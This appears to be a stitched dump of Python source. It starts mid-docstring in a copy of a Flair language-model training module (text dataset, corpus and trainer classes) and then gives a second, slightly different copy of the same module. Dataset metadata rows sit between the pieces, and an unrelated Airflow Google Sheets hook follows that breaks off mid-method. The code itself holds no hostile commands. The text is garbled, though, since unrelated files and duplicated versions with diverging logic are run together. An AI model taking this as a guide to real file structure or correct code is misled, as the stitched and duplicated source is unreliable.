    ``torch.LongTensor`` of dictionary indices, built character-by-character
    (or whitespace-token-wise when ``split_on_char`` is False), filled front-
    to-back or back-to-front depending on ``forward``.
    """

    def __init__(self, path, dictionary, expand_vocab=False, forward=True, split_on_char=True, random_case_flip=True, shuffle_lines=True):
        assert path.exists()
        self.path = path
        self.dictionary = dictionary
        self.split_on_char = split_on_char
        self.forward = forward
        self.random_case_flip = random_case_flip
        self.expand_vocab = expand_vocab
        self.shuffle_lines = shuffle_lines
        # A directory is treated as a corpus of splits; a single file as one split.
        if path.is_dir():
            self.files = sorted([f for f in path.iterdir() if f.exists()])
        else:
            self.files = [path]

    def __len__(self):
        return len(self.files)

    def __getitem__(self, index=0):
        return self.charsplit(self.files[index], self.expand_vocab, self.forward, self.split_on_char, self.random_case_flip)

    def charsplit(self, path, expand_vocab=False, forward=True, split_on_char=True, random_case_flip=True):
        """Tokenizes a text file on character basis."""
        assert path.exists()
        # BUG FIX: close the file handle (it was previously left open).
        with open(path, 'r', encoding='utf-8') as f:
            lines = f.readlines()
        log.info(
            ''.join(['read text file with ', '{}'.format(len(lines)), ' lines']))
        if self.shuffle_lines:
            random.shuffle(lines)
            log.info('shuffled')
        # First pass: count tokens and (optionally) grow the vocabulary.
        tokens = 0
        for line in lines:
            if split_on_char:
                chars = list(line)
            else:
                chars = line.split()
            tokens += len(chars)
            if expand_vocab:
                for char in chars:
                    self.dictionary.add_item(char)
        ids = torch.zeros(tokens, dtype=torch.long)
        # Second pass: fill the id tensor, front-to-back or back-to-front.
        if forward:
            token = 0
            for line in lines:
                if random_case_flip:
                    line = self.random_casechange(line)
                if split_on_char:
                    chars = list(line)
                else:
                    chars = line.split()
                for char in chars:
                    if token >= tokens:
                        break
                    ids[token] = self.dictionary.get_idx_for_item(char)
                    token += 1
        else:
            token = (tokens - 1)
            for line in lines:
                if random_case_flip:
                    line = self.random_casechange(line)
                if split_on_char:
                    chars = list(line)
                else:
                    chars = line.split()
                for char in chars:
                    # NOTE(review): for the backward fill this guard can never
                    # trigger (token only decreases) -- kept for parity with
                    # the forward branch.
                    if token >= tokens:
                        break
                    ids[token] = self.dictionary.get_idx_for_item(char)
                    token -= 1
        return ids

    @staticmethod
    def random_casechange(line):
        """With probability 1/100 each, lower- or upper-case the whole line."""
        no = random.randint(0, 99)
        # BUG FIX: compare ints with ==, not identity (`is`), which relies on
        # CPython's small-int caching and is flagged by linters.
        if no == 0:
            line = line.lower()
        if no == 1:
            line = line.upper()
        return line

    def tokenize(self, path):
        """Tokenizes a text file."""
        assert path.exists()
        # First pass: build the word vocabulary (with <eos> per line).
        with open(path, 'r') as f:
            tokens = 0
            for line in f:
                words = (line.split() + ['<eos>'])
                tokens += len(words)
                for word in words:
                    self.dictionary.add_word(word)
        # Second pass: map every word to its index.
        with open(path, 'r') as f:
            ids = torch.zeros(tokens, dtype=torch.long, device=flair.device)
            token = 0
            for line in f:
                words = (line.split() + ['<eos>'])
                for word in words:
                    ids[token] = self.dictionary.word2idx[word]
                    token += 1
        return ids
class TextCorpus(object):
    """Bundle of train/valid/test datasets under one corpus directory.

    Expects *path* to contain a ``train`` directory (or file) plus
    ``valid.txt`` and ``test.txt``.  Valid and test are materialized eagerly
    as id tensors; train stays a lazy ``TextDataset``.
    """

    def __init__(self, path, dictionary, forward=True, character_level=True, random_case_flip=True, shuffle_lines=True):
        self.dictionary = dictionary
        self.forward = forward
        self.split_on_char = character_level
        self.random_case_flip = random_case_flip
        self.shuffle_lines = shuffle_lines
        if type(path) == str:
            path = Path(path)

        def make_split(name, shuffle):
            # expand_vocab is always False: the dictionary is fixed up front.
            return TextDataset((path / name), dictionary, False, self.forward,
                               self.split_on_char, self.random_case_flip,
                               shuffle_lines=shuffle)

        self.train = make_split('train', self.shuffle_lines)
        self.valid = make_split('valid.txt', False)[0]
        self.test = make_split('test.txt', False)[0]
class LanguageModelTrainer():
    """Trains a LanguageModel over a TextCorpus, split by split.

    Supports LR annealing on validation loss, optional mixed precision
    (apex amp), periodic checkpointing, and resuming from a saved
    epoch/split/loss state.
    """

    def __init__(self, model, corpus, optimizer=SGD, test_mode=False, epoch=0, split=0, loss=10000, optimizer_state=None):
        # epoch/split/loss/optimizer_state allow resuming from a checkpoint.
        self.model = model
        self.optimizer = optimizer
        self.corpus = corpus
        self.test_mode = test_mode
        self.loss_function = torch.nn.CrossEntropyLoss()
        self.log_interval = 100
        self.epoch = epoch
        self.split = split
        self.loss = loss
        self.optimizer_state = optimizer_state

    def train(self, base_path, sequence_length, learning_rate=20, mini_batch_size=100, anneal_factor=0.25, patience=10, clip=0.25, max_epochs=1000, checkpoint=False, grow_to_sequence_length=0, num_workers=2, use_amp=False, amp_opt_level='O1', **kwargs):
        """Run the training loop.

        Writes best-lm.pt, per-epoch checkpoints, loss.txt and training.log
        under *base_path*; ends with a test-set evaluation (also reached
        after a KeyboardInterrupt).
        """
        if use_amp:
            if (sys.version_info < (3, 0)):
                raise RuntimeError(
                    'Apex currently only supports Python 3. Aborting.')
            if (amp is None):
                raise RuntimeError(
                    'Failed to import apex. Please install apex from https://www.github.com/nvidia/apex to enable mixed-precision training.')
        if (type(base_path) is str):
            base_path = Path(base_path)
        add_file_handler(log, (base_path / 'training.log'))
        number_of_splits = len(self.corpus.train)
        # Validation data is batched once up front and reused every split.
        val_data = self._batchify(self.corpus.valid, mini_batch_size)
        base_path.mkdir(parents=True, exist_ok=True)
        loss_txt = (base_path / 'loss.txt')
        savefile = (base_path / 'best-lm.pt')
        try:
            epoch = self.epoch
            best_val_loss = self.loss
            optimizer = self.optimizer(
                self.model.parameters(), lr=learning_rate, **kwargs)
            if (self.optimizer_state is not None):
                optimizer.load_state_dict(self.optimizer_state)
            # Decoupled-weight-decay optimizers need the matching scheduler.
            if isinstance(optimizer, (AdamW, SGDW)):
                scheduler = ReduceLRWDOnPlateau(
                    optimizer, verbose=True, factor=anneal_factor, patience=patience)
            else:
                scheduler = ReduceLROnPlateau(
                    optimizer, verbose=True, factor=anneal_factor, patience=patience)
            if use_amp:
                (self.model, optimizer) = amp.initialize(
                    self.model, optimizer, opt_level=amp_opt_level)
            training_generator = DataLoader(
                self.corpus.train, shuffle=False, num_workers=num_workers)
            for epoch in range(self.epoch, max_epochs):
                epoch_start_time = time.time()
                # Shuffle the split order from the second epoch onwards.
                if (epoch > 0):
                    training_generator = DataLoader(
                        self.corpus.train, shuffle=True, num_workers=num_workers)
                self.model.save_checkpoint(
                    (base_path / ''.join(['epoch_', '{}'.format(epoch), '.pt'])), optimizer, epoch, 0, best_val_loss)
                for (curr_split, train_slice) in enumerate(training_generator, self.split):
                    # Optionally lengthen BPTT sequences over time.
                    if (sequence_length < grow_to_sequence_length):
                        sequence_length += 1
                    log.info(
                        ''.join(['Sequence length is ', '{}'.format(sequence_length)]))
                    split_start_time = time.time()
                    curr_split += 1
                    train_data = self._batchify(
                        train_slice.flatten(), mini_batch_size)
                    log.info((('Split %d' % curr_split) +
                              '\t - ({:%H:%M:%S})'.format(datetime.datetime.now())))
                    # Pick up the (possibly annealed) current learning rate.
                    for group in optimizer.param_groups:
                        learning_rate = group['lr']
                    self.model.train()
                    hidden = self.model.init_hidden(mini_batch_size)
                    ntokens = len(self.corpus.dictionary)
                    total_loss = 0
                    start_time = time.time()
                    for (batch, i) in enumerate(range(0, (train_data.size(0) - 1), sequence_length)):
                        (data, targets) = self._get_batch(
                            train_data, i, sequence_length)
                        if ((not data.is_cuda) and cuda.is_available()):
                            log.info(
                                ('Batch %d is not on CUDA, training will be very slow' % batch))
                            raise Exception('data isnt on cuda')
                        self.model.zero_grad()
                        optimizer.zero_grad()
                        (output, rnn_output, hidden) = self.model.forward(
                            data, hidden)
                        loss = self.loss_function(
                            output.view((- 1), ntokens), targets)
                        if use_amp:
                            with amp.scale_loss(loss, optimizer) as scaled_loss:
                                scaled_loss.backward()
                        else:
                            loss.backward()
                        # Gradient clipping guards against exploding RNN gradients.
                        torch.nn.utils.clip_grad_norm_(
                            self.model.parameters(), clip)
                        optimizer.step()
                        total_loss += loss.data
                        # Detach the hidden state so BPTT stops at chunk boundaries.
                        hidden = self._repackage_hidden(hidden)
                        del loss, output, rnn_output
                        if (((batch % self.log_interval) == 0) and (batch > 0)):
                            cur_loss = (total_loss.item() / self.log_interval)
                            elapsed = (time.time() - start_time)
                            log.info('| split {:3d} /{:3d} | {:5d}/{:5d} batches | ms/batch {:5.2f} | loss {:5.2f} | ppl {:8.2f}'.format(
                                curr_split, number_of_splits, batch, (len(train_data) // sequence_length), ((elapsed * 1000) / self.log_interval), cur_loss, math.exp(cur_loss)))
                            total_loss = 0
                            start_time = time.time()
                    log.info(('%d seconds for train split %d' %
                              ((time.time() - split_start_time), curr_split)))
                    self.model.eval()
                    val_loss = self.evaluate(
                        val_data, mini_batch_size, sequence_length)
                    scheduler.step(val_loss)
                    log.info('best loss so far {:5.2f}'.format(best_val_loss))
                    log.info(self.model.generate_text())
                    if checkpoint:
                        self.model.save_checkpoint(
                            (base_path / 'checkpoint.pt'), optimizer, epoch, curr_split, best_val_loss)
                    if (val_loss < best_val_loss):
                        # NOTE(review): best_score is set to the PREVIOUS best
                        # loss rather than the new val_loss -- confirm intended.
                        self.model.best_score = best_val_loss
                        self.model.save(savefile)
                        best_val_loss = val_loss
                    log.info(('-' * 89))
                    summary = '| end of split {:3d} /{:3d} | epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | valid ppl {:8.2f} | learning rate {:3.4f}'.format(
                        curr_split, number_of_splits, (epoch + 1), (time.time() - split_start_time), val_loss, math.exp(val_loss), learning_rate)
                    with open(loss_txt, 'a') as myfile:
                        myfile.write(('%s\n' % summary))
                    log.info(summary)
                    log.info(('-' * 89))
                log.info(('Epoch time: %.2f' %
                          (time.time() - epoch_start_time)))
        except KeyboardInterrupt:
            log.info(('-' * 89))
            log.info('Exiting from training early')
        # Final evaluation on the test split (also reached after Ctrl-C).
        test_data = self._batchify(self.corpus.test, mini_batch_size)
        test_loss = self.evaluate(test_data, mini_batch_size, sequence_length)
        summary = 'TEST: valid loss {:5.2f} | valid ppl {:8.2f}'.format(
            test_loss, math.exp(test_loss))
        with open(loss_txt, 'a') as myfile:
            myfile.write(('%s\n' % summary))
        log.info(summary)
        log.info(('-' * 89))

    def evaluate(self, data_source, eval_batch_size, sequence_length):
        """Average per-token cross-entropy of the model over *data_source*."""
        self.model.eval()
        with torch.no_grad():
            total_loss = 0
            ntokens = len(self.corpus.dictionary)
            hidden = self.model.init_hidden(eval_batch_size)
            for i in range(0, (data_source.size(0) - 1), sequence_length):
                (data, targets) = self._get_batch(
                    data_source, i, sequence_length)
                (prediction, rnn_output, hidden) = self.model.forward(data, hidden)
                output_flat = prediction.view((- 1), ntokens)
                # Weight each chunk's loss by its length before normalizing.
                total_loss += (len(data) *
                               self.loss_function(output_flat, targets).data)
                hidden = self._repackage_hidden(hidden)
            return (total_loss.item() / len(data_source))

    @staticmethod
    def _batchify(data, batch_size):
        # Trim the tail so the data divides evenly, then lay out as
        # (sequence, batch) columns for BPTT chunking.
        nbatch = (data.size(0) // batch_size)
        data = data.narrow(0, 0, (nbatch * batch_size))
        data = data.view(batch_size, (- 1)).t().contiguous()
        return data

    @staticmethod
    def _get_batch(source, i, sequence_length):
        # Inputs are source[i:i+L]; targets are the same tokens shifted by one.
        seq_len = min(sequence_length, ((len(source) - 1) - i))
        data = source[i:(i + seq_len)].clone().detach()
        target = source[(i + 1):((i + 1) + seq_len)
                        ].view((- 1)).clone().detach()
        data = data.to(flair.device)
        target = target.to(flair.device)
        return (data, target)

    @staticmethod
    def _repackage_hidden(h):
        'Wraps hidden states in new tensors, to detach them from their history.'
        return tuple((v.clone().detach() for v in h))

    @staticmethod
    def load_from_checkpoint(checkpoint_file, corpus, optimizer=SGD):
        """Rebuild a trainer (model, optimizer state, progress) from a checkpoint file."""
        checkpoint = LanguageModel.load_checkpoint(checkpoint_file)
        return LanguageModelTrainer(checkpoint['model'], corpus, optimizer, epoch=checkpoint['epoch'], split=checkpoint['split'], loss=checkpoint['loss'], optimizer_state=checkpoint['optimizer_state_dict'])
| 46.250765 | 253 | 0.540796 |
import time
import datetime
import random
import sys
import logging
from pathlib import Path
from typing import Union
from torch import cuda
from torch.utils.data import Dataset, DataLoader
from torch.optim.sgd import SGD
try:
from apex import amp
except ImportError:
amp = None
import flair
from flair.data import Dictionary
from flair.models import LanguageModel
from flair.optim import *
from flair.training_utils import add_file_handler
log = logging.getLogger('flair')
class TextDataset(Dataset):
    """Dataset yielding one tensor of token ids per text file.

    *path* may be a single file or a directory of files.  Each item is a 1-D
    ``torch.LongTensor`` of dictionary indices, built character-by-character
    (or whitespace-token-wise when ``split_on_char`` is False), filled front-
    to-back or back-to-front depending on ``forward``.
    """

    def __init__(self, path, dictionary, expand_vocab=False, forward=True, split_on_char=True, random_case_flip=True, shuffle_lines=True):
        assert path.exists()
        self.path = path
        self.dictionary = dictionary
        self.split_on_char = split_on_char
        self.forward = forward
        self.random_case_flip = random_case_flip
        self.expand_vocab = expand_vocab
        self.shuffle_lines = shuffle_lines
        # A directory is treated as a corpus of splits; a single file as one split.
        if path.is_dir():
            self.files = sorted([f for f in path.iterdir() if f.exists()])
        else:
            self.files = [path]

    def __len__(self):
        return len(self.files)

    def __getitem__(self, index=0):
        return self.charsplit(self.files[index], self.expand_vocab, self.forward, self.split_on_char, self.random_case_flip)

    def charsplit(self, path, expand_vocab=False, forward=True, split_on_char=True, random_case_flip=True):
        """Tokenize one text file on a character (or whitespace-token) basis."""
        assert path.exists()
        # BUG FIX: close the file handle (it was previously left open).
        with open(path, 'r', encoding='utf-8') as f:
            lines = f.readlines()
        log.info(
            ''.join(['read text file with ', '{}'.format(len(lines)), ' lines']))
        if self.shuffle_lines:
            random.shuffle(lines)
            log.info('shuffled')
        # First pass: count tokens and (optionally) grow the vocabulary.
        tokens = 0
        for line in lines:
            if split_on_char:
                chars = list(line)
            else:
                chars = line.split()
            tokens += len(chars)
            if expand_vocab:
                for char in chars:
                    self.dictionary.add_item(char)
        ids = torch.zeros(tokens, dtype=torch.long)
        # Second pass: fill the id tensor, front-to-back or back-to-front.
        if forward:
            token = 0
            for line in lines:
                if random_case_flip:
                    line = self.random_casechange(line)
                if split_on_char:
                    chars = list(line)
                else:
                    chars = line.split()
                for char in chars:
                    if token >= tokens:
                        break
                    ids[token] = self.dictionary.get_idx_for_item(char)
                    token += 1
        else:
            token = (tokens - 1)
            for line in lines:
                if random_case_flip:
                    line = self.random_casechange(line)
                if split_on_char:
                    chars = list(line)
                else:
                    chars = line.split()
                for char in chars:
                    # NOTE(review): for the backward fill this guard can never
                    # trigger (token only decreases) -- kept for parity with
                    # the forward branch.
                    if token >= tokens:
                        break
                    ids[token] = self.dictionary.get_idx_for_item(char)
                    token -= 1
        return ids

    @staticmethod
    def random_casechange(line):
        """With probability 1/100 each, lower- or upper-case the whole line."""
        no = random.randint(0, 99)
        # BUG FIX: compare ints with ==, not identity (`is`), which relies on
        # CPython's small-int caching and is flagged by linters.
        if no == 0:
            line = line.lower()
        if no == 1:
            line = line.upper()
        return line

    def tokenize(self, path):
        """Tokenize one text file word-by-word (with <eos> per line)."""
        assert path.exists()
        # First pass: build the word vocabulary.
        with open(path, 'r') as f:
            tokens = 0
            for line in f:
                words = (line.split() + ['<eos>'])
                tokens += len(words)
                for word in words:
                    self.dictionary.add_word(word)
        # Second pass: map every word to its index.
        with open(path, 'r') as f:
            ids = torch.zeros(tokens, dtype=torch.long, device=flair.device)
            token = 0
            for line in f:
                words = (line.split() + ['<eos>'])
                for word in words:
                    ids[token] = self.dictionary.word2idx[word]
                    token += 1
        return ids
class TextCorpus(object):
    """Bundles the train/valid/test splits of a language-model corpus.

    Expects under ``path`` a ``train`` directory (one file per split) plus
    ``valid.txt`` and ``test.txt`` files.
    """

    def __init__(self, path, dictionary, forward=True, character_level=True, random_case_flip=True, shuffle_lines=True):
        """
        :param path: corpus root directory (``str`` or ``pathlib.Path``)
        :param dictionary: symbol <-> id mapping shared by all splits
        :param forward: train a forward (True) or backward (False) LM
        :param character_level: split on characters instead of tokens
        :param random_case_flip: randomly case-flip training lines
        :param shuffle_lines: shuffle training lines before tokenization
        """
        self.dictionary = dictionary
        self.forward = forward
        self.split_on_char = character_level
        self.random_case_flip = random_case_flip
        self.shuffle_lines = shuffle_lines
        # IMPROVED: isinstance() instead of type(...) == str — idiomatic and
        # also accepts str subclasses; behavior otherwise unchanged.
        if isinstance(path, str):
            path = Path(path)
        # Training data stays a lazily-tokenized dataset of per-file splits...
        self.train = TextDataset((path / 'train'), dictionary, False, self.forward,
                                 self.split_on_char, self.random_case_flip, shuffle_lines=self.shuffle_lines)
        # ...while valid/test are eagerly tokenized into single id tensors
        # (index [0] pulls the only item out of the one-file dataset).
        self.valid = TextDataset((path / 'valid.txt'), dictionary, False, self.forward,
                                 self.split_on_char, self.random_case_flip, shuffle_lines=False)[0]
        self.test = TextDataset((path / 'test.txt'), dictionary, False, self.forward,
                                self.split_on_char, self.random_case_flip, shuffle_lines=False)[0]
class LanguageModelTrainer():
    """Trains a ``LanguageModel`` on a ``TextCorpus``, split by split.

    Supports resuming from a checkpoint: ``epoch``/``split``/``loss``/
    ``optimizer_state`` restore trainer state (see :meth:`load_from_checkpoint`).
    """

    def __init__(self, model, corpus, optimizer=SGD, test_mode=False, epoch=0, split=0, loss=10000, optimizer_state=None):
        self.model = model
        self.optimizer = optimizer
        self.corpus = corpus
        # NOTE(review): test_mode is stored but never read in this class —
        # presumably consumed elsewhere; confirm before removing.
        self.test_mode = test_mode
        self.loss_function = torch.nn.CrossEntropyLoss()
        # log a progress line every 100 mini-batches
        self.log_interval = 100
        # resume state (defaults describe a fresh run; loss=10000 acts as +inf)
        self.epoch = epoch
        self.split = split
        self.loss = loss
        self.optimizer_state = optimizer_state

    def train(self, base_path, sequence_length, learning_rate=20, mini_batch_size=100, anneal_factor=0.25, patience=10, clip=0.25, max_epochs=1000, checkpoint=False, grow_to_sequence_length=0, num_workers=2, use_amp=False, amp_opt_level='O1', **kwargs):
        """Run the training loop.

        :param base_path: directory for logs, checkpoints and the best model
        :param sequence_length: BPTT window length (may grow each split up to
            ``grow_to_sequence_length``)
        :param learning_rate: initial LR, annealed by ``anneal_factor`` after
            ``patience`` splits without validation improvement
        :param clip: gradient-norm clipping threshold
        :param checkpoint: if True, write ``checkpoint.pt`` after every split
        :param use_amp: mixed-precision training via NVIDIA apex
        :param kwargs: forwarded to the optimizer constructor
        """
        if use_amp:
            if (sys.version_info < (3, 0)):
                raise RuntimeError(
                    'Apex currently only supports Python 3. Aborting.')
            # 'amp' is expected to be in scope via an earlier optional import
            # (presumably from flair.optim's wildcard import) — None means
            # apex is not installed.
            if (amp is None):
                raise RuntimeError(
                    'Failed to import apex. Please install apex from https://www.github.com/nvidia/apex to enable mixed-precision training.')
        if (type(base_path) is str):
            base_path = Path(base_path)
        add_file_handler(log, (base_path / 'training.log'))
        number_of_splits = len(self.corpus.train)
        val_data = self._batchify(self.corpus.valid, mini_batch_size)
        base_path.mkdir(parents=True, exist_ok=True)
        loss_txt = (base_path / 'loss.txt')
        savefile = (base_path / 'best-lm.pt')
        try:
            epoch = self.epoch
            best_val_loss = self.loss
            optimizer = self.optimizer(
                self.model.parameters(), lr=learning_rate, **kwargs)
            if (self.optimizer_state is not None):
                optimizer.load_state_dict(self.optimizer_state)
            # weight-decay-aware optimizers get the matching scheduler variant
            if isinstance(optimizer, (AdamW, SGDW)):
                scheduler = ReduceLRWDOnPlateau(
                    optimizer, verbose=True, factor=anneal_factor, patience=patience)
            else:
                scheduler = ReduceLROnPlateau(
                    optimizer, verbose=True, factor=anneal_factor, patience=patience)
            if use_amp:
                (self.model, optimizer) = amp.initialize(
                    self.model, optimizer, opt_level=amp_opt_level)
            # first epoch keeps the (possibly resumed) split order; later
            # epochs reshuffle the splits
            training_generator = DataLoader(
                self.corpus.train, shuffle=False, num_workers=num_workers)
            for epoch in range(self.epoch, max_epochs):
                epoch_start_time = time.time()
                if (epoch > 0):
                    training_generator = DataLoader(
                        self.corpus.train, shuffle=True, num_workers=num_workers)
                    # snapshot the model at every epoch boundary
                    self.model.save_checkpoint(
                        (base_path / ''.join(['epoch_', '{}'.format(epoch), '.pt'])), optimizer, epoch, 0, best_val_loss)
                for (curr_split, train_slice) in enumerate(training_generator, self.split):
                    # optional curriculum: lengthen the BPTT window per split
                    if (sequence_length < grow_to_sequence_length):
                        sequence_length += 1
                    log.info(
                        ''.join(['Sequence length is ', '{}'.format(sequence_length)]))
                    split_start_time = time.time()
                    curr_split += 1
                    train_data = self._batchify(
                        train_slice.flatten(), mini_batch_size)
                    log.info((('Split %d' % curr_split) +
                              '\t - ({:%H:%M:%S})'.format(datetime.datetime.now())))
                    # read back the (possibly annealed) LR for logging
                    for group in optimizer.param_groups:
                        learning_rate = group['lr']
                    self.model.train()
                    hidden = self.model.init_hidden(mini_batch_size)
                    ntokens = len(self.corpus.dictionary)
                    total_loss = 0
                    start_time = time.time()
                    for (batch, i) in enumerate(range(0, (train_data.size(0) - 1), sequence_length)):
                        (data, targets) = self._get_batch(
                            train_data, i, sequence_length)
                        # hard failure if CUDA exists but the data is on CPU —
                        # training would silently be orders of magnitude slower
                        if ((not data.is_cuda) and cuda.is_available()):
                            log.info(
                                ('Batch %d is not on CUDA, training will be very slow' % batch))
                            raise Exception('data isnt on cuda')
                        self.model.zero_grad()
                        optimizer.zero_grad()
                        (output, rnn_output, hidden) = self.model.forward(
                            data, hidden)
                        loss = self.loss_function(
                            output.view((- 1), ntokens), targets)
                        if use_amp:
                            with amp.scale_loss(loss, optimizer) as scaled_loss:
                                scaled_loss.backward()
                        else:
                            loss.backward()
                        # clip gradients to mitigate exploding gradients in RNNs
                        torch.nn.utils.clip_grad_norm_(
                            self.model.parameters(), clip)
                        optimizer.step()
                        total_loss += loss.data
                        # detach the hidden state so BPTT is truncated at the
                        # sequence boundary (graph is not kept across batches)
                        hidden = self._repackage_hidden(hidden)
                        del loss, output, rnn_output
                        if (((batch % self.log_interval) == 0) and (batch > 0)):
                            cur_loss = (total_loss.item() / self.log_interval)
                            elapsed = (time.time() - start_time)
                            log.info('| split {:3d} /{:3d} | {:5d}/{:5d} batches | ms/batch {:5.2f} | loss {:5.2f} | ppl {:8.2f}'.format(
                                curr_split, number_of_splits, batch, (len(train_data) // sequence_length), ((elapsed * 1000) / self.log_interval), cur_loss, math.exp(cur_loss)))
                            total_loss = 0
                            start_time = time.time()
                    log.info(('%d seconds for train split %d' %
                              ((time.time() - split_start_time), curr_split)))
                    # validate after every split and let the scheduler anneal
                    self.model.eval()
                    val_loss = self.evaluate(
                        val_data, mini_batch_size, sequence_length)
                    scheduler.step(val_loss)
                    log.info('best loss so far {:5.2f}'.format(best_val_loss))
                    log.info(self.model.generate_text())
                    if checkpoint:
                        self.model.save_checkpoint(
                            (base_path / 'checkpoint.pt'), optimizer, epoch, curr_split, best_val_loss)
                    if (val_loss < best_val_loss):
                        # NOTE(review): best_score is set to the PREVIOUS best
                        # (best_val_loss is only updated two lines below) —
                        # looks intentional in upstream code, but confirm.
                        self.model.best_score = best_val_loss
                        self.model.save(savefile)
                        best_val_loss = val_loss
                    log.info(('-' * 89))
                    summary = '| end of split {:3d} /{:3d} | epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | valid ppl {:8.2f} | learning rate {:3.4f}'.format(
                        curr_split, number_of_splits, (epoch + 1), (time.time() - split_start_time), val_loss, math.exp(val_loss), learning_rate)
                    with open(loss_txt, 'a') as myfile:
                        myfile.write(('%s\n' % summary))
                    log.info(summary)
                    log.info(('-' * 89))
                log.info(('Epoch time: %.2f' %
                          (time.time() - epoch_start_time)))
        except KeyboardInterrupt:
            # Ctrl-C stops training but still runs the final test evaluation
            log.info(('-' * 89))
            log.info('Exiting from training early')
        test_data = self._batchify(self.corpus.test, mini_batch_size)
        test_loss = self.evaluate(test_data, mini_batch_size, sequence_length)
        summary = 'TEST: valid loss {:5.2f} | valid ppl {:8.2f}'.format(
            test_loss, math.exp(test_loss))
        with open(loss_txt, 'a') as myfile:
            myfile.write(('%s\n' % summary))
        log.info(summary)
        log.info(('-' * 89))

    def evaluate(self, data_source, eval_batch_size, sequence_length):
        """Return the mean cross-entropy of the model over ``data_source``."""
        self.model.eval()
        with torch.no_grad():
            total_loss = 0
            ntokens = len(self.corpus.dictionary)
            hidden = self.model.init_hidden(eval_batch_size)
            for i in range(0, (data_source.size(0) - 1), sequence_length):
                (data, targets) = self._get_batch(
                    data_source, i, sequence_length)
                (prediction, rnn_output, hidden) = self.model.forward(data, hidden)
                output_flat = prediction.view((- 1), ntokens)
                # weight each window's loss by its length so the final mean
                # is per-position over the whole source
                total_loss += (len(data) *
                               self.loss_function(output_flat, targets).data)
                hidden = self._repackage_hidden(hidden)
            return (total_loss.item() / len(data_source))

    @staticmethod
    def _batchify(data, batch_size):
        """Reshape a 1-D id tensor into (seq_len, batch_size) columns,
        trimming the tail that does not fill a whole batch."""
        nbatch = (data.size(0) // batch_size)
        data = data.narrow(0, 0, (nbatch * batch_size))
        data = data.view(batch_size, (- 1)).t().contiguous()
        return data

    @staticmethod
    def _get_batch(source, i, sequence_length):
        """Slice one BPTT window starting at row ``i``; targets are the
        inputs shifted by one position, flattened for the loss."""
        seq_len = min(sequence_length, ((len(source) - 1) - i))
        data = source[i:(i + seq_len)].clone().detach()
        target = source[(i + 1):((i + 1) + seq_len)
                        ].view((- 1)).clone().detach()
        data = data.to(flair.device)
        target = target.to(flair.device)
        return (data, target)

    @staticmethod
    def _repackage_hidden(h):
        """Detach hidden states from their computation graph (truncated BPTT)."""
        return tuple((v.clone().detach() for v in h))

    @staticmethod
    def load_from_checkpoint(checkpoint_file, corpus, optimizer=SGD):
        """Rebuild a trainer (model + resume state) from a saved checkpoint."""
        checkpoint = LanguageModel.load_checkpoint(checkpoint_file)
        return LanguageModelTrainer(checkpoint['model'], corpus, optimizer, epoch=checkpoint['epoch'], split=checkpoint['split'], loss=checkpoint['loss'], optimizer_state=checkpoint['optimizer_state_dict'])
| true | true |
f732816fcf0c052b8864c70a21b2d1c1057d92db | 14,981 | py | Python | airflow/providers/google/suite/hooks/sheets.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 8 | 2017-04-20T16:15:44.000Z | 2020-10-11T13:44:10.000Z | airflow/providers/google/suite/hooks/sheets.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 219 | 2017-03-15T18:40:16.000Z | 2022-02-28T22:52:43.000Z | airflow/providers/google/suite/hooks/sheets.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 3 | 2016-07-14T21:51:10.000Z | 2020-10-12T13:26:36.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
This module contains a Google Sheets API hook
"""
from typing import Any, Dict, List, Optional
from googleapiclient.discovery import build
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.base import CloudBaseHook
class GSheetsHook(CloudBaseHook):
    """
    Interact with Google Sheets via GCP connection
    Reading and writing cells in Google Sheet:
    https://developers.google.com/sheets/api/guides/values

    :param gcp_conn_id: The connection ID to use when fetching connection info.
    :type gcp_conn_id: str
    :param spreadsheet_id: The Google Sheet ID to interact with
    :type spreadsheet_id: str
    :param api_version: API Version
    :type api_version: str
    :param delegate_to: The account to impersonate, if any.
        For this to work, the service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    """

    def __init__(
        self,
        spreadsheet_id: str,
        gcp_conn_id: str = 'google_cloud_default',
        api_version: str = 'v4',
        delegate_to: Optional[str] = None
    ) -> None:
        super().__init__(gcp_conn_id, delegate_to)
        self.spreadsheet_id = spreadsheet_id
        self.gcp_conn_id = gcp_conn_id
        self.api_version = api_version
        self.delegate_to = delegate_to
        # lazily-built Sheets service client (see get_conn)
        self._conn = None

    def get_conn(self) -> Any:
        """
        Retrieves connection to Google Sheets.

        :return: Google Sheets services object.
        :rtype: Any
        """
        # build the client once and cache it for subsequent calls
        if not self._conn:
            http_authorized = self._authorize()
            self._conn = build('sheets', self.api_version, http=http_authorized, cache_discovery=False)
        return self._conn

    @CloudBaseHook.catch_http_exception
    def get_values(
        self,
        range_: str,
        major_dimension: str = 'DIMENSION_UNSPECIFIED',
        value_render_option: str = 'FORMATTED_VALUE',
        date_time_render_option: str = 'SERIAL_NUMBER'
    ) -> Dict:
        """
        Gets values from Google Sheet from a single range
        https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/get

        :param range_: The A1 notation of the values to retrieve.
        :type range_: str
        :param major_dimension: Indicates which dimension an operation should apply to.
            DIMENSION_UNSPECIFIED, ROWS, or COLUMNS
        :type major_dimension: str
        :param value_render_option: Determines how values should be rendered in the output.
            FORMATTED_VALUE, UNFORMATTED_VALUE, or FORMULA
        :type value_render_option: str
        :param date_time_render_option: Determines how dates should be rendered in the output.
            SERIAL_NUMBER or FORMATTED_STRING
        :type date_time_render_option: str
        :return: Google Sheets API response.
        :rtype: Dict
        """
        service = self.get_conn()
